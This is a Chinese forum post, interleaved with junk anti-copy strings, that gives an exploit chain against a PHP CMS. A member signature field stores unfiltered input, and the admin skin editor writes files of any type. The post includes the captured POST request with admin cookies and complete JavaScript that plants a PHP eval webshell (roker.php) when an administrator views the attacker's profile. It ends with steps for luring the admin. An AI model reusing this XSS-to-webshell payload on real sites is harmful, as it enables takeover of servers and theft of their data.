|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
, \2 Z% B7 Q* n官网已经修补了,所以重新下了源码
' C! N: J6 ]# G* K5 I! z/ u因为 后台登入 还需要认证码 所以 注入就没看了。
6 e- U f9 y c" \$ Y存在 xss- k/ k- e5 q% O
漏洞文件 user/member/skin_edit.php% J. D# K. K* L2 ]6 ]
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:" }: }0 i" |* |& j6 K
) b& u7 Y v* J, |% d</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>( ~3 G2 S* H% W+ F
2 |& G8 N) m' q @! P9 R
</textarea></td></tr>+ f- z$ W8 ?' k, i& c# z
: }. q5 ?. B1 W' _
user/do.php ( t0 B) @) {8 B+ N& U/ `; V8 x* m& H
! L. y2 V2 O1 G/ H0 u" ?' ^ D5 D$ E, ]/ t/ u
if($op=='zl'){ //资料5 K5 } Q+ v9 [
5 }! ]4 P/ ^+ y7 B, v0 O1 p) y! B/ S if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
0 n' l, l I) _" O [ exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
7 e- e8 L- [4 c: u9 y, }9 C3 e$ x + E, C3 r. k# Z; I
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',8 t9 j2 u; V P; |" {
. d7 _. b. i6 @" g2 ~9 P CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
* S6 h8 p) a3 s: {; T! D where CS_Name='".$cscms_name."'";8 R F) V1 ~) c
2 i& b5 v8 L* @, U6 L' y if($db->query($sql)){
: x' l- B2 F @' G( _. B- X. U f
# T% r: x, D- q0 h2 \ exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
5 E! Z/ j Z9 o' x! o2 ]) D# v7 a
! @0 Q! ]7 P8 \, z3 y; J L }else{9 Y/ T3 f) d7 ]% M. c+ M1 j
8 _7 ?' E0 x: o- ]% g# z) q exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
4 w+ ~/ |1 ?- i+ j2 ]% {7 c" q3 ` 9 G+ C+ D# Q6 `0 [7 M1 W
}
: J; j5 x& n1 v% E* A w' f
! n" G9 Y9 L/ {8 J+ ~8 ~: N
) W, }: U) A8 H) D1 u- m没有 过滤导致xss产生。
8 }: z5 u K* W% y2 ~/ ~, }; \; |后台 看了下 很奇葩的是可以写任意格式文件。。' k K- Y' u: P K5 F: R L5 X
抓包。。' g7 U- h9 I0 Z( k
) A. Y- K0 B: e! {$ P& o$ z
1 Y1 i$ @( M( f+ i$ w! w6 L本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
3 ]* Q. r, Y9 u% `+ m4 P
- N$ p7 _- v) _' dAccept: text/html, application/xhtml+xml, */*$ }& C2 f1 C: c6 o6 E& M& [
, z2 [/ e6 S: P/ }8 n3 g2 g
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php0 y8 i, W2 q9 W! _& A# w
; H# Y! }- g7 K2 a4 |0 ~2 k+ tAccept-Language: zh-CN' n5 n1 o# w; O( D4 {
, q, X% m% l8 C6 Q2 l
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
0 [3 u" F, W) R& y3 c |- M
$ {" C7 T5 I, v* A+ o5 xContent-Type: application/x-www-form-urlencoded" A/ d9 ^- V* R' k. C
0 [* \$ I; Y0 F3 U% k& _Accept-Encoding: gzip, deflate
; d$ }0 L. Y) X0 G. H4 ~$ r* J
* E3 M8 m. Y `: c2 r( ?& gHost: 127.0.0.13 t8 K5 l* D6 t; |
, j" C9 G, ^7 o3 b0 k4 I
Content-Length: 38
: U0 S7 G# d' B& j: T/ t1 o
; L! y- e' a) `* j8 r PDNT: 1
6 ]1 U+ ?- ^! B) k' r8 |0 q
x3 ^* H; J& n+ K# k+ dConnection: Keep-Alive
7 `) ?3 F- P7 g0 F
( ]; L/ Z( D0 F7 V1 I+ WCache-Control: no-cache
; W3 D5 X7 y! |0 O* L0 U/ { k$ A! a. S0 \' o+ K3 L9 V/ B
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
: j4 {. L' ~; A4 L0 Y+ o/ b
) f3 a3 D" G+ |4 l0 w3 f( h$ J, y' r8 s* B
name=aaa.php&content=%3Cs%3E%3Ca%25%3E2 X8 [7 Z9 y) \* f, n4 J2 v% n
4 y0 |' n! ~' d( e4 p/ t- S) Q* F
$ H5 ?% _1 k" Z+ s4 m( d7 S
8 F; z" b' M* q! j6 e# [: Z& b" G于是 构造js如下。
M* D6 w) x6 n. e1 C& W! l6 J: D p2 m# y- G: E
本帖隐藏的内容<script>
( O5 x) Z9 Q# J6 X m7 s5 F3 @$ `thisTHost = top.location.hostname;6 R! Z% T# W$ D6 C% e/ D
" p! a( r5 `6 k; z! E9 e
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
* A9 `) `( x" L % |9 s3 i$ S9 f# v; n& I6 c
function PostSubmit(url, data, msg) { ' t& @8 n% L2 ^3 i& ]
var postUrl = url;3 B6 C/ J1 [# J5 g9 R
) H: `6 ?+ ^. u# n
var postData = data;
6 b- c: F1 {; S5 @/ a var msgData = msg; & K. I0 {& s% y0 w( F6 c. A
var ExportForm = document.createElement("FORM");
6 s% h3 a& T# s document.body.appendChild(ExportForm); / }% V) d) M+ j
ExportForm.method = "POST";
! a* B9 G# _2 E0 T: p2 l$ ^) v. m var newElement = document.createElement("input"); # [7 A$ U5 y$ G I! K
newElement.setAttribute("name", "name");
; q/ }- ^+ P+ p3 b7 q newElement.setAttribute("type", "hidden"); * d. w, d- C% s9 }6 |* H/ M
var newElement2 = document.createElement("input"); - E4 _! `* \" g0 r! w4 g
newElement2.setAttribute("name", "content"); 4 x X. R2 R0 m1 A, `$ r
newElement2.setAttribute("type", "hidden"); ' H* |# J+ Q+ n' V; `5 O
ExportForm.appendChild(newElement); * {. r" l9 ~. Z, `
ExportForm.appendChild(newElement2); s$ c$ c9 E7 r! {
newElement.value = postData;
' F/ N, ]" W P) Q newElement2.value = msgData;
+ c1 |% h: l% Q& M9 N ExportForm.action = postUrl;
' v: u* f: h4 i: [2 {2 {; ^ ExportForm.submit(); 3 U3 y1 P/ F* |: L$ V
};
/ A% f& f i. f9 `- G+ t8 Z
1 u( B2 i- r- C% J, D: zPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
; ~/ x/ r$ K2 M+ z2 K2 v0 \ 0 Y) P0 T. ]7 E' o3 A
</script>! m0 _# k8 a, Y% B3 G- @
5 p7 l u1 w) o# Q' t
6 M" B' D2 G8 {0 R2 q" X1 ^6 f
1 {1 {; s" A/ A( r6 R
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
! }% K5 c) M, v- b2 z+ [用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)8 [" D% I7 F9 t& K p! ~
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
6 B7 V' u' w# C, O |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对